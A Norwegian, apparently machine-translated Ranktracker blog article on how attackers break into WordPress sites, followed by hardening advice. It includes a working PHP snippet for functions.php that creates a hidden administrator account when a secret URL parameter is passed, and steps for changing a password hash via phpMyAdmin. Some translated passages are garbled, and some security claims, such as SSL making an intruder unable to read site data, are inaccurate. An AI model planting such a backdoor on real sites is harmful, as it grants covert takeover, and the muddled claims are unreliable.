• WordPress

Hvordan hacke WordPress?

  • Felix Rose-Collins
  • 8 min read
Hvordan hacke WordPress?

Introduksjon

Før du begynner på denne artikkelen, vil vi gjøre deg oppmerksom på at hacking er ulovlig, og at vi ikke motiverer eller oppfordrer til ondsinnede aktiviteter. Denne artikkelen er utelukkende for å få kunnskap om hvordan svindlere jobber og hvordan varierte metoder for nettstedssikkerhet er avgjørende for å holde dem i sjakk. La oss diskutere:

  • Hvordan hacker svindlere WordPress?
  • Hvordan sikre WP-nettstedet ditt mot svindlere?

Så la oss uten videre gå i gang med emnet.

Hvordan hacke WordPress-nettstedet online?

How to Hack WordPress Website Online (Kilde: wpsecurityninja.com)

Bruke WPScan:

WPScan er en WP-sikkerhetsskanner som hjelper nettstedseiere med å sjekke WordPress-nettstedet deres for sårbarheter, men denne skanneren brukes også av hackere for å oppfylle sine motiver for å hacke nettsteder.

WPScan tillater nettstedseiere og administratorer å spesifisere WP brukerkontoer og brute force-passord og er det fremste trinnet i å få uautorisert tilgang til WP-kontoer.

Brute force username and password using WPScan (Brute force brukernavn og passord ved hjelp av WPScan. Kilde: Medium)

MIM-angrep:

Man-in-middle-angrep (MIM-angrep) kan enkelt utføres når det gjelder brukere som bruker lignende LAN. Ikke-krypterte brukerpålogginger er et mykt mål siden alle detaljene er synlige i klartekst.

Programvaren som er involvert i å utføre denne typen angrep, kan oppdage kompromitterte temaer, plugins og kan telle opp brukere.

MIM Attacks (Kilde: Medium)

SQL-injeksjoner:

SQL-injeksjonsangrep regnes som de mest fremtredende angrepene som brukes for å trenge inn på nettsteder. Disse angrepene retter seg mot backend-portene på nettstedet og gjør det mulig for hackere å trenge inn i dem ved å implementere kompromitterte kommandoer.

SQL Injections (Kilde: secure.wphackedhelp.com)

Møt Ranktracker

Alt-i-ett-plattformen for effektiv søkemotoroptimalisering

Bak enhver vellykket bedrift ligger en sterk SEO-kampanje. Men med utallige optimaliseringsverktøy og teknikker der ute å velge mellom, kan det være vanskelig å vite hvor du skal begynne. Vel, frykt ikke mer, for jeg har akkurat det som kan hjelpe deg. Vi presenterer Ranktracker alt-i-ett-plattformen for effektiv SEO.

Vi har endelig åpnet registreringen til Ranktracker helt gratis!

Opprett en gratis konto

Eller logg inn med påloggingsinformasjonen din

Disse inntrengningene gjør det også mulig for hackere å endre databaser og kommandoer og slette eller stjele informasjon på nettstedet.

Siden disse SQL-angrepene oppdager sårbare og uoppdaterte nettsteder, gjør de hackingen enkel og vellykket.

Bruk av My SQL/cPanel:

I denne metoden oppretter hackere en falsk konto eller endrer passordet til en nåværende WP-nettstedsbruker. Hackere prøver å trenge inn via cPanel ved å åpne PhpMyAdmin. De er på utkikk etter tabellen som slutter på _users og finner brukeren de vil endre.

Dette vil tillate dem å endre påloggingsinformasjonen til brukeren som de planlegger å hacke. De sporer brukeren og endrer brukerens passord (fra user_pass-feltet) ved å åpne MD5-generatoren på nettet og erstatte det med ønsket passord, og deretter klikke på #.

Utilizing My SQL/cPanel (Brukernavn, brukernes hash-passord, e-post-ID-er osv. lagres i databasetabellen wp_users. Kilde: firstsiteguide.com)

Brukernavn, brukernes hash-passord, e-post-ID-er osv. lagres i databasetabellen wp_users.

Redigeringsfunksjoner.php:

Hackere får også tilgang til cPanel for å endre Functions.php-filen. Ved å låse opp filbehandleren jakter de på mappen til det aktive temaet. Fra mappen public_html/wp_content/themes sporer de temaet og redigerer functions.php ved å plassere den kompromitterte koden. Hackingen er allerede i gang fordi hackerne har opprettet en ny konto. Når det er gjort, sletter de den kompromitterte koden.

Opprett en ny brukerkonto via FTP:

Vanligvis hjelper FTP-kontoer nettstedseiere med å opprette en katalog på nettstedet som gjør det mulig for bestemte brukere å laste opp/ned filer ved hjelp av påloggingsinformasjonen sin.

Disse filene vises også på internett.

Fremgangsmåte for å opprette en FTP-konto på nettstedet:

  • Skriv inn de ønskede dataene
  • Skriv inn brukernavnet til den nye FTP-brukeren
  • Skriv inn passordet for tildeling av konto for tilgang via FTP
  • Angi katalognavnet for å gi tilgang til via FTP
  • Skriv ønsket MB plass som du ønsker å tildele til denne mappen.
  • Senere trykker du på knappen "Opprett" for å opprette den nye kontoen.

Dataene nedenfor må lastes inn av den nye brukeren for å få tilgang via FTP.


Adresse / vertsnavn / adresse: yourdomain.com eller ftp.yourdomain.com Bruker / bruker: user@yourdomain.com Passord: El passord tildelt denne FTP-kontoen

Port: 21Navngi mappen for opplasting/nedlasting av filer.


Den nye brukeren vil ha lese- og skrivetillatelser både på den valgte katalogen og på alle underkatalogene den inneholder. Hvis du for eksempel oppretter klientbrukeren og gir ham tilgang til / home / user / public_html

Å trenge gjennom bakdøren:

En ondsinnet måte å trenge inn på nettstedet på er via bakdøren. Enten det er en svindler som ønsker å få tilgang til nettstedet ditt, eller offeret som ønsker å få tilgang til nettstedet sitt igjen via bakdøren, må de begge følge trinnene nedenfor.

Møt Ranktracker

Alt-i-ett-plattformen for effektiv søkemotoroptimalisering

Bak enhver vellykket bedrift ligger en sterk SEO-kampanje. Men med utallige optimaliseringsverktøy og teknikker der ute å velge mellom, kan det være vanskelig å vite hvor du skal begynne. Vel, frykt ikke mer, for jeg har akkurat det som kan hjelpe deg. Vi presenterer Ranktracker alt-i-ett-plattformen for effektiv SEO.

Vi har endelig åpnet registreringen til Ranktracker helt gratis!

Opprett en gratis konto

Eller logg inn med påloggingsinformasjonen din

I tilfeller når en ny brukerkonto opprettes via FTP eller et passord tilbakestilles, men det ikke gir ønskede resultater, kan brukeren ønske å hacke nettstedet sitt via bakdør og hente administratortilgangen.

Fremgangsmåte for å opprette bakdør:

  • Åpne filen functions.php og lim inn koden nedenfor.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Lagre endringer senere.

Kryptojacking og utvinning av kryptovaluta:

Populariteten til kryptovalutaer har gitt opphav til nye cybertrusler som kryptokapning, som også kalles malware for utvinning av kryptovalutaer.

Å konfiskere en datamaskin mot brukerens vilje og bevissthet kalles kryptokapring. Ved kryptokapring infiserer svindlerne brukerens datamaskin med skadelig skadevare som leveres via programvare for å kompromittere systemer og nettverk.

Phishing:

Phishing er en metode der svindlere lurer brukere av sensitiv informasjon (påloggingsinformasjon, personnummer, PIN-kode, kredittkortopplysninger osv.) ved å utgi seg for å være juridiske personer. De tyr vanligvis til e-post for å oppnå sitt formål.

Eksempel: En svindler kan utgi seg for å være en pålitelig kilde og samle inn personopplysninger fra brukere for å oppfylle deres ønsker. De kan også legge inn en falsk lenke i phishing-e-posten og lede dem til et svindelaktig nettsted for å levere skadelig programvare.

Skadevare:

WordPress-sikkerhetsstatistikk indikerer at 4000 WP-nettsteder er infisert av skadelig programvare på grunn av falske SEO-plugins.

Svindlere trenger ikke en kilde for å levere skadelig programvare. SEO-plugins, WP-temaer og mange andre faktorer på nettstedet har motivert hackere til å bruke den nylige WP-VCD-skadelige programvaren.

Selv phishing-e-poster er inngangsporter til å levere skadelig programvare.

Også her er hackernes motto det samme, nemlig å få tak i sensitive data fra brukerne ved å trenge inn i systemer og stjele informasjon.

WordPress Ransomware:

I WP ransomware bruker hackere skadevare for å blokkere brukertilgang til systemer og nettverk. Det samme kan brukeren få tilbake ved å betale løsepenger som hackeren krever.

Eksempel: Petya-angrepet, der hackeren krypterer filene og dataene dine og krever løsepenger mot dekrypteringsnøkkelen.

Cross-Site Scripting-angrep (XSS):

XSS-angrep utføres av hackere ved å injisere skadelig innhold på nettstedet og dermed utnytte nettleseren. Dette angrepet gjør det mulig for hackeren å stjele data fra informasjonskapsler, endre nettstedets innhold og kapre nettstedet for å få tak i sensitive data.

Clickjacking:

I clickjacking gjør hackeren et ondsinnet forsøk på å kompromittere en knapp/lenke og motiverer brukeren til å klikke på det kompromitterte objektet. Dette gjør det mulig for hackeren å utføre ondsinnede kommandoer for å få tilgang til brukersensitive data.

Spoofing:

Spoofing er et angrep der en person forkler seg som en troverdig identitet for å oppnå ulovlige fordeler for brukeren og lure dem til å sende inn konfidensiell informasjon.

For å forhindre alle disse hackerangrepene må det treffes spesifikke sikkerhetstiltak for å sikre WP-nettstedet ditt.

Hvordan sikre WordPress-nettstedet mot hacking?

How to Secure WordPress Website from Hacking? (Kilde: envisagedigital.co.uk)

Ovennevnte statistikk er nok til å indikere populariteten til WordPress. Det er denne populariteten som gjør denne CMS-plattformen mer ønskelig blant hackere, som prøver varierte hackingsmetoder for å få tilgang til WP-nettsteder og deres data.

Derfor er det viktig å vite hvordan du kan hindre hackere i å få tilgang til WP-nettstedet ditt.

Sikre WP-nettstedet ditt med SSL-sertifikat:

Når data lastes inn på nettstedet, er det alltid i klartekst som er lett synlig for alle, inkludert hackere. Dette kan være risikabelt siden hackere kan misbruke nettstedets data.

SSL-sertifikater (Secure Socket Layers) er de digitale sertifikatene som hjelper deg med å sikre WP-nettstedet ditt med 256-biters krypteringssikkerhet, og dermed konvertere nettsteddataene dine til et kodet format.

Hackere kan ikke lese koder selv om de har fått tilgang til nettstedet ditt, og derfor er de tvunget til å forlate slike nettsteder.

Secure your WP site with SSL Certificate (Kilde: clickssl.net)

Velg ønsket merke av SSL-sertifikat (Comodo, Thawte, RapidSSL, etc.) og installer det samme på WP-nettstedet ditt. Når det gjelder typen SSL-sertifikat, må du forstå domener og underdomener. For eksempel, hvis WP-nettstedet ditt har underdomener, kan et enkelt billig Wildcard-sertifikat som koster bare $ 45 / år omtrent sikre hele din digitale virksomhet.

Rask utstedelse, 2048-biters nøkkelkryptering, et løft i SEO, nettstedets tillitsforsegling, 99 % nettleser-/mobilkompatibilitet, refusjonspolicy og garanti er noen av funksjonene og fordelene ved å installere Wildcard SSL-sertifikater.

Varierte merker og alternativer for SSL-produkter, budsjettvennlige priser og utmerket kundeservice er noen av fordelene ved å nærme seg ClickSSL-butikken for å sikre WP-nettstedet ditt.

Oppdater dine ansatte:

Menneskelige feil kan være katastrofale, så sørg alltid for å holde de ansatte oppdatert om de nyeste cybertruslene for å unngå at de blir sårbare.

Hvis dine ansatte kan spore mistenkelige signaler fra et hacket nettsted i den innledende fasen, kan de informere de berørte og forhindre at nettstedet og virksomheten din blir ytterligere skadet.

Bruk tofaktorautentisering (2FA):

Implementering av 2FA under pålogging på nettstedet er den viktigste måten å avverge brute force-angrep på. I tillegg til å legge til et ekstra sikkerhetslag, beskytter de også nettsted- og brukerdata.

Dette skyldes at hvis ett sikkerhetslag er kompromittert, må svindleren invadere det andre laget for å få tilgang til nettstedet.

Dette er en vanskelig avgjørelse, og derfor ender svindlerne i de fleste tilfeller opp med å flytte til andre dårlig sikrede nettsteder.

Tips: WP 2FA er en gratis WP-plugin som gir et ekstra sikkerhetslag til WP-nettstedet ditt.

Kontroller administrasjonsbrukere regelmessig:

Dette er viktig for sikkerheten til WP-nettstedet ditt. Sørg for å revidere administratorbrukerne dine regelmessig og kryssjekke tilgangene deres.

Sørg også for at brukerne dine, så vel som de ansatte, har begrenset tilgang i henhold til oppgavene deres, for å forhindre sikkerhetsbrudd.

Oppdater WordPress Core regelmessig:

Uvitende om WP Core?

La meg orientere deg om at WP Core inneholder alle de grunnleggende grunnleggende filene som kreves for at WP skal fungere.

Filoversikten i WP zip-filen lastet ned fra WordPress.org.

Update WordPress Core Regularly (Kilde: ithemes.com)

Disse kjernefilene må oppdateres regelmessig etter utgivelsen av sikkerhetsoppdateringer for å tette alle sikkerhetshull.

Last ned WP-temaer og plugins fra pålitelige kilder:

Dette er avgjørende fordi plugins kan være truende når de ikke oppdateres eller installeres fra ikke-pålitelige kilder. Hvis du bruker gratis/betalte plugins, må du alltid sjekke faktorene nedenfor, som f.eks:

  • Brukervurderinger og anmeldelser
  • Brukervennlighet
  • Kompatibilitet
  • Sikkerhet
  • Pålitelighet

Download WP Themes & Plugins from Trustworthy Sources (Kilde: torquemag.io)

Den samme regelen gjelder også for installasjon av WP-temaer.

Oppdater WP-temaer og plugins regelmessig:

Utdaterte eller utløpte WP-temaer og plugins utgjør alltid en trussel mot WP-nettstedet ditt siden de mister sikkerhetsstandardene. For å forhindre at hackere bruker slike gateways for å spre skadelig programvare for å få tilgang til nettstedet, må du sørge for å oppdatere temaene og pluginene som brukes på WP-nettstedet ditt regelmessig.

Dette vil bidra til at programtillegget fungerer som det skal og er synkronisert med de nyeste versjonene av WP.

Tips: På siden for programtillegg kan du se alle installerte programtillegg og en lenke som sier "Aktiver automatiske oppdateringer" ved siden av hvert programtillegg. Slå den på for automatiske oppdateringer.

Endre standard administratornavn:

Hackere er for smarte, og de kan enkelt trenge inn på WP-nettstedet ditt ved å bruke standard administratornavn. Det er alltid å foretrekke å endre standard admin-brukernavn for å forhindre hackere i å utføre brute-force-angrep for å få uautorisert tilgang til nettstedet ditt.

Gi begrenset tilgang:

Gi aldri mer enn nødvendig, og den samme regelen gjelder for å gi tilgang til nettstedet til både brukere og ansatte.

Tilgangskontroll er den viktigste regelen for nettstedet og datasikkerheten, siden den definerer hvem som kan eller ikke kan få tilgang til nettstedet. Blokker alle innganger til WP admin og andre kritiske koder og data for nettstedets sikkerhet.

Begrenset tilgang forbedrer ikke bare produktiviteten, men sikrer også nettstedet ditt mot ondsinnede oppføringer.

Oppdater WordPress:

Når WordPress ikke er oppdatert, risikerer nettstedet ditt å bli invadert av hackere.

WordPress har 37 % av markedsandelen, og det lanseres jevnlig oppdateringer for å fikse sikkerhetshull og feil. Disse oppdateringene inkluderer også nye funksjoner og forbedringer av de eksisterende som er nyttige for å forbedre nettstedets ytelse.

Møt Ranktracker

Alt-i-ett-plattformen for effektiv søkemotoroptimalisering

Bak enhver vellykket bedrift ligger en sterk SEO-kampanje. Men med utallige optimaliseringsverktøy og teknikker der ute å velge mellom, kan det være vanskelig å vite hvor du skal begynne. Vel, frykt ikke mer, for jeg har akkurat det som kan hjelpe deg. Vi presenterer Ranktracker alt-i-ett-plattformen for effektiv SEO.

Vi har endelig åpnet registreringen til Ranktracker helt gratis!

Opprett en gratis konto

Eller logg inn med påloggingsinformasjonen din

Why you should always update your wordpress (Kilde: wpbeginner.com)

Hold WP-nettstedet ditt oppdatert for robust sikkerhet.

Avslutning:

Bruk sterke og komplekse passord og hold WP-nettstedet ditt samt plugins og temaer oppdatert for å fikse alle sikkerhetsbrister. Ta deg tid til å utdanne dine ansatte, da det alltid vil bidra til å forhindre katastrofer.

Gå aldri løs på sikkerheten og sørg alltid for å bruke de beste og pålitelige sikkerhetspluginene for å beskytte WP-nettstedet ditt mot nysgjerrige øyne. I tillegg bør du sikre nettstedet ditt med SSL for å styrke kundenes tillit, virksomheten og SEO.

Nå som du er klar over hvordan hackerne fungerer, håper vi at denne artikkelen hjelper deg med å forhindre hackere i å trenge inn på nettstedet ditt og administrere WP-nettstedet ditt på en sikker måte.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Begynn å bruke Ranktracker... Gratis!

Finn ut hva som hindrer nettstedet ditt i å bli rangert.

Opprett en gratis konto

Eller logg inn med påloggingsinformasjonen din

Different views of Ranktracker app